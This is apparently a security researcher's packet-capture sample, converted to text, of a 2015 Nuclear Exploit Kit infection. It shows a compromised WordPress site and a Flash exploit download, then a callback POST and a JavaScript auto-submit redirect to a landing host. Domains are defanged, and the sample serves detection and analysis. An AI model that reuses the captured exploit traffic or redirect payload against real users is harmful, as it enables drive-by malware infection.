Nuclear Exploit Kit with Callbacks PCAP Converted Traffic Sample

June 22, 2015

2015-02-04 11:51:34.092279 IP 192.168.221.134.63245 > 192.168.221.2.53: 19334+ A? www.clearimagedevices[.]com. (43)
E..GU-……………..5.3LcK…………www.clearimagedevices[.]com…..
2015-02-04 11:51:34.135718 IP 192.168.221.2.53 > 192.168.221.134.63245: 19334 1/0/0 A 64.9.192.3 (59)
E..W.!……………5…C..K…………www.clearimagedevices[.]com……………..@ ..
2015-02-04 11:51:34.139407 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [S], seq 2253522424, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U/@….Y….@ …..P.R…….. ._]…………..
2015-02-04 11:51:34.242046 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [S.], seq 3104561041, ack 2253522425, win 64240, options [mss 1460], length 0
E..,.”…..m@ …….P…….R..`………….
2015-02-04 11:51:34.242202 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [.], ack 1, win 64240, length 0
E..(U0@….d….@ …..P.R……P…4………
2015-02-04 11:51:34.244155 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 1:685, ack 1, win 64240, length 684
E…U1@………@ …..P.R……P…R…GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.google[.]com/url?url=http://www.clearimagedevices[.]com/&rct=j&frm=1&q=&esrc=s&sa=U&ei=_j_SVNj8A7aOsQSep4CoCA&ved=0CBgQFjAA&usg=AFQjCNGhlESOpeUlh_svL7dp3-Y8wzYbUw
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:34.244363 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 685, win 64240, length 0
E..(.#…..p@ …….P…….R..P…1………
2015-02-04 11:51:34.870670 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 1:1356, ack 685, win 64240, length 1355
E..s.$…..$@ …….P…….R..P…_m..HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.4.24
X-Pingback: http://www.clearimagedevices[.]com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:32 GMT
Content-Length: 36259
2015-02-04 11:51:35.326482 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [.], ack 43358, win 64240, length 0
E..(Uj@….*….@ …..P.R……P….0……..
2015-02-04 11:51:35.327599 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 1534:1953, ack 43358, win 64240, length 419
E…Uk@………@ …..P.R……P…….GET /wp-content/plugins/google-calendar-events/js/jquery-qtip.js HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:35.327707 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 1953, win 64240, length 0
E..(……..@ …….P…….R..P………….
2015-02-04 11:51:35.427957 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 43358:44713, ack 1953, win 64240, length 1355
E..s……..@ …….P…….R..P…#6..HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Aug 2014 13:33:28 GMT
Accept-Ranges: bytes
ETag: "1f305d7cfbc1cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:32 GMT
Content-Length: 38442

/*!
* jquery.qtip. The jQuery tooltip plugin
*
* Copyright (c) 2009 Craig Thompson
* http://craigsworks[.]com
*
* Licensed under MIT
* http://www.opensource.org/licenses/mit-license.php
*
* Launch : February 2009
* Version : 1.0.0-rc3
* Released: Tuesday 12th May, 2009 - 00:00
* Debug: jquery.qtip.debug.js
2015-02-04 11:51:36.233188 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 1953:2342, ack 82064, win 64240, length 389
E…U.@….6….@ …..P.R…..!P…….GET /?mcsf_action=main_css&ver=4.1 HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:36.233287 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 2342, win 64240, length 0
E..(……..@ …….P…..!.R..P………….
2015-02-04 11:51:36.470090 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 82064:83419, ack 2342, win 64240, length 1355
E..s…….X@ …….P…..!.R..P…….HTTP/1.1 200 OK
Content-Type: text/css
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.4.24
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:33 GMT
Content-Length: 1192
2015-02-04 11:51:36.523801 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 2342:2760, ack 83434, win 62870, length 418
E…U.@………@ …..P.R…..{P…v…GET /wp-content/themes/u-design/fonts/league_gothic-webfont.eot HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:36.523938 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 2760, win 64240, length 0
E..(……..@ …….P…..{.R..P………….
2015-02-04 11:51:36.635816 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 83434:84789, ack 2760, win 64240, length 1355
E..s.…..>@ …….P…..{.R..P…%..HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 01 Jul 2014 00:36:48 GMT
Accept-Ranges: bytes
ETag: "8da74c8bc494cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:33 GMT
Content-Length: 20451
2015-02-04 11:51:36.767766 IP 192.168.221.134.50416 > 104.207.224.17.80: Flags [P.], seq 1:414, ack 1, win 64240, length 413
E…V @………h……P.’s…..P…….GET /c2e1276ab796e512a567123b9d44aeb5.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.clearimagedevices[.]com/
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: serpsite[.]com
Connection: Keep-Alive
2015-02-04 11:51:36.774962 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 2760:3138, ack 104149, win 64240, length 378
E…V#@………@ …..P.R….nfP…8Q..GET /images/button2.png HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:36.775064 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 3138, win 64240, length 0
E..(.R…..A@ …….P….nf.R.:P….t……..
2015-02-04 11:51:36.834835 IP 104.207.224.17.80 > 192.168.221.134.50416: Flags [P.], seq 1:1233, ack 414, win 64240, length 1232
E….[….].h……..P…….’t.P….U..HTTP/1.1 200 OK
Date: Wed, 04 Feb 2015 15:51:34 GMT
Server: Apache
Last-Modified: Tue, 16 Dec 2014 13:12:20 GMT
ETag: "3ae-50a551be45500"
Accept-Ranges: bytes
Content-Length: 942
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-shockwave-flash

CWS ….x.}T.r.4…….I.VM..,tY…Nb’..0]`..N.ma.i..-.f.;.N.}……..}..DE^..fa.xt….;.9….5.._..C.|.
.8…..l…….~Y…s.{W….c.@.h………..K…..Ea…..c/.f…_&7!;..Y……]…..M.1.>..k…`…..Q……fr…….o9.R’bY.w=kd..3d}.2L..i.A5…..w.1.._….;.|…………G.S:e:N..s..
W.U.]j…7….\…A.1….:}….&I.D .Xz…2..V…Q….^.z….d…b..k..s.a..q.\..a….Q.$.B’….^b,M.4{.nX.gk…’.i….Uyb…Y2….y!]…a.s_/…,g…..VKw….=…..h{..’..vs…irv.
>/….s..$..o…U.Y..@.<.a%q..D..-..W.).i..,.J….9E>…Gs..;…x…k..&..9.Lx….X…..:C. .a…4..A..Gk…..{…,o….r……w…X].I.#….P.”.n.-B.6…..].G…9$]..|…….X.H}.~.>..1.BIVjB…l…..-.]….{…].., .0’bQ…Q.K………:F…….P.P.A..(.
.g…0.aQ….S..`a….&.F..? … .J..e.H….
…P@m..@. gA(+….[H…mR[.u……6..A+…C..T&.C..H..J.k/….t%..A.ldc..s.n.Y.[.l#Jl..1…p..w..Y(27….\….z.S……Bc.V5{W..4{_..4.P……..@N…..SY>z.+……..r.
2015-02-04 11:51:36.935456 IP 104.207.224.17.80 > 192.168.221.134.50416: Flags [P.], seq 1:1233, ack 414, win 64240, length 1232
E….k….].h……..P…….’t.P….U..HTTP/1.1 200 OK
Date: Wed, 04 Feb 2015 15:51:34 GMT
Server: Apache
Last-Modified: Tue, 16 Dec 2014 13:12:20 GMT
ETag: "3ae-50a551be45500"
Accept-Ranges: bytes
Content-Length: 942
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-shockwave-flash
2015-02-04 11:51:38.402469 IP 192.168.221.134.50418 > 66.96.133.6.80: Flags [P.], seq 1:731, ack 1, win 64240, length 730
E…VN@…<…..B`…..P.M……P…….POST /b685cf9fdc885f90abbb39b13022d1c4.php?q=072ac022371c7b35b84aac33ec1dae96 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
Referer: http://serpsite[.]com/c2e1276ab796e512a567123b9d44aeb5.swf
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: canadahalalec[.]com
Content-Length: 335
Connection: Keep-Alive
Cache-Control: no-cache
2015-02-04 11:51:38.402564 IP 66.96.133.6.80 > 192.168.221.134.50418: Flags [.], ack 731, win 64240, length 0
E..(……..B`…….P…….M .P………….
2015-02-04 11:51:38.402570 IP 192.168.221.134.50418 > 66.96.133.6.80: Flags [P.], seq 731:1066, ack 1, win 64240, length 335
E..wVO@…=…..B`…..P.M …..P…….ip=7QqvDotmyXP1vjJQ&ua=tlP7Vt89hmr1vjdAW8YqmDT%2FsGFiyxROsPBX45R6HxinEeZC%2BYGrgEA0mmA3NDIJUYzgWXCjQvX0Bz9J7EQJgwkNd6BPfJHRPQDLeAbXKoyZ1AF3ZlM9iUoAREe61Uect0rMRTVcywggs9Gi6vlATKjsE8rl4JFYd32k4Zp8n8vryMmzxpW4CE22uM0hgUyJ%2BRpdvugXWsf1qsm4dxE%3D&furl=s0j1T4l%2ByD%2B58ykNGtM8liHz6mtvyl4wxth0z6ccYWHvTaR9wbqXq1B34kYCQmdjC9iDbXinWqm7Sic%3D
2015-02-04 11:51:38.402643 IP 66.96.133.6.80 > 192.168.221.134.50418: Flags [.], ack 1066, win 64240, length 0
2015-02-04 11:51:38.418730 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 3138:3564, ack 122546, win 64240, length 426
E…VS@………@ …..P.R.:…CP….A..GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.3 HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:38.418825 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 3564, win 64240, length 0
E..(……..@ …….P…..C.R..P…G………
2015-02-04 11:51:38.509596 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], seq 122546:124006, ack 3564, win 64240, length 1460
E………..@ …….P…..C.R..P…….HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 16 Jan 2015 14:54:09 GMT
Accept-Ranges: bytes
ETag: "aeab8c489c31d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:35 GMT
Content-Length: 9658
2015-02-04 11:51:38.514841 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 3564:3996, ack 132467, win 63804, length 432
E…Vm@….w….@ …..P.R……P..<….GET /wp-content/themes/u-design/styles/style1/images/textured_background1.png HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:38.514967 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 3996, win 64240, length 0
E..(……..@ …….P…….R..P….|……..
2015-02-04 11:51:38.609633 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 132467:133822, ack 3996, win 64240, length 1355
E..s…….1@ …….P…….R..P….’..HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 01 Jul 2014 00:36:48 GMT
Accept-Ranges: bytes
ETag: "291e438bc494cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:35 GMT
Content-Length: 19454

.PNG
.
2015-02-04 11:51:38.683814 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 3996:4428, ack 152170, win 64240, length 432
E…V.@….B….@ …..P.R….).P…~…GET /wp-content/themes/u-design/scripts/superfish-1.4.8/images/sf-menu-bg.png HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:38.683895 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 4428, win 64240, length 0
E..(.c…..0@ …….P….)..R.DP………….
2015-02-04 11:51:38.701764 IP 66.96.133.6.80 > 192.168.221.134.50418: Flags [P.], seq 1:525, ack 1066, win 64240, length 524
E..4.m……B`…….P…….M”AP….S..HTTP/1.1 200 OK
Date: Wed, 04 Feb 2015 15:51:36 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Keep-Alive: timeout=30
Server: Apache/2
X-Powered-By: PHP/5.2.17
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT

<form id='myLink' action='http://zxc.mivycem[.]com/EVEPEVFFWxgbHQUXDg0XHAVcDkoCCgs.html' method='GET'></form><script>document.getElementById('myLink').submit();</script>
2015-02-04 11:51:38.712931 IP 192.168.221.134.57458 > 192.168.221.2.53: 3140+ A? zxc.mivycem[.]com. (33)
E..=V……-………r.5.).r.D………..zxc.mivycem[.]com…..
2015-02-04 11:51:38.748992 IP 192.168.221.2.53 > 192.168.221.134.57458: 3140 1/0/0 A 5.9.120.123 (49)
E..M…….A………5.r.9x..D………..zxc.mivycem[.]com……………… x{
2015-02-04 11:51:38.750960 IP 192.168.221.134.50421 > 5.9.120.123.80: Flags [S], seq 4104030343, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4V.@….^….. x{…P………. ……………..
2015-02-04 11:51:38.756695 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 152170:153525, ack 4428, win 64240, length 1355
E..s……..@ …….P….)..R.DP….U..HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 01 Jul 2014 00:36:48 GMT
Accept-Ranges: bytes
ETag: "98ce538bc494cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:35 GMT
Content-Length: 2055

.PNG
.
….IHDR…….\……..-….tEXtSoftware.Adobe ImageReadyq.e<….IDATx….j.@.@….\…..; “j.wf:..X……I^p..m./..|..q.c.C.s..<../.<,..<.<M.MlB.4!.V…t
u……..nO N..<m.N.V?….3..<..y…..u*.N……..\…’…S.L..up…g.s..):..f.I..S..h}.<.\7.^..v.M………o…vIt.X,>..>……JpnF.p8$..`…a………j……@x.@x……………@x.@x……………@x.@x……………@x.@x………………….@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x……………@x…..@x.@x……………@x.@x……………@
2015-02-04 11:51:38.761111 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 153525:154473, ack 4428, win 64240, length 948
E……….V@ …….P…./F.R.DP….d..x.@x……………@x.@x………………….@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x………………….@x.@x……………@x.@x……………@x.@x……………@x………………@x………………@x……………@x…..@x.@x……………@x.@x……………@x.@x……………@x.@x………………….@x………………@x………………@x……………@x.@x……………@x.@x……………@x.@x……………………….l..,.K….’…e%…..IEND.B`.
2015-02-04 11:51:38.787477 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [.], ack 154473, win 64240, length 0
E..(V.@………@ …..P.R.D..2.P………….
2015-02-04 11:51:38.801782 IP 66.96.133.6.80 > 192.168.221.134.50418: Flags [P.], seq 1:525, ack 1066, win 64240, length 524
E..4……..B`…….P…….M”AP….S..HTTP/1.1 200 OK
Date: Wed, 04 Feb 2015 15:51:36 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Keep-Alive: timeout=30
Server: Apache/2
X-Powered-By: PHP/5.2.17
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT

<form id='myLink' action='http://zxc.mivycem[.]com/EVEPEVFFWxgbHQUXDg0XHAVcDkoCCgs.html' method='GET'></form><script>document.getElementById('myLink').submit();</script>
2015-02-04 11:51:38.802710 IP 192.168.221.134.50418 > 66.96.133.6.80: Flags [.], ack 525, win 63716, length 0
E..(V.@…>~….B`…..P.M”A….P………….
2015-02-04 11:51:38.848453 IP 192.168.221.134.50402 > 64.9.192.3.80: Flags [P.], seq 4428:4853, ack 154473, win 64240, length 425
E…V.@….,….@ …..P.R.D..2.P…….GET /wp-content/themes/u-design/styles/common-images/dark-button-l.png HTTP/1.1
Accept: */*
Referer: http://www.clearimagedevices[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.clearimagedevices[.]com
Connection: Keep-Alive
2015-02-04 11:51:38.848575 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [.], ack 4853, win 64240, length 0
E..(……..@ …….P….2..R..P….,……..
2015-02-04 11:51:38.892198 IP 5.9.120.123.80 > 192.168.221.134.50421: Flags [S.], seq 1913677619, ack 4104030344, win 64240, options [mss 1460], length 0
E..,……,`. x{…..P..r.g3….`…e………
2015-02-04 11:51:38.899975 IP 192.168.221.134.50421 > 5.9.120.123.80: Flags [.], ack 1, win 64240, length 0
E..(V.@….Q….. x{…P….r.g4P…}~……..
2015-02-04 11:51:38.911167 IP 64.9.192.3.80 > 192.168.221.134.50402: Flags [P.], seq 154473:155080, ack 4853, win 64240, length 607
E……….r@ …….P….2..R..P…y…HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 01 Jul 2014 00:36:48 GMT
Accept-Ranges: bytes
ETag: "8280458bc494cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 Feb 2015 15:51:35 GMT
Content-Length: 360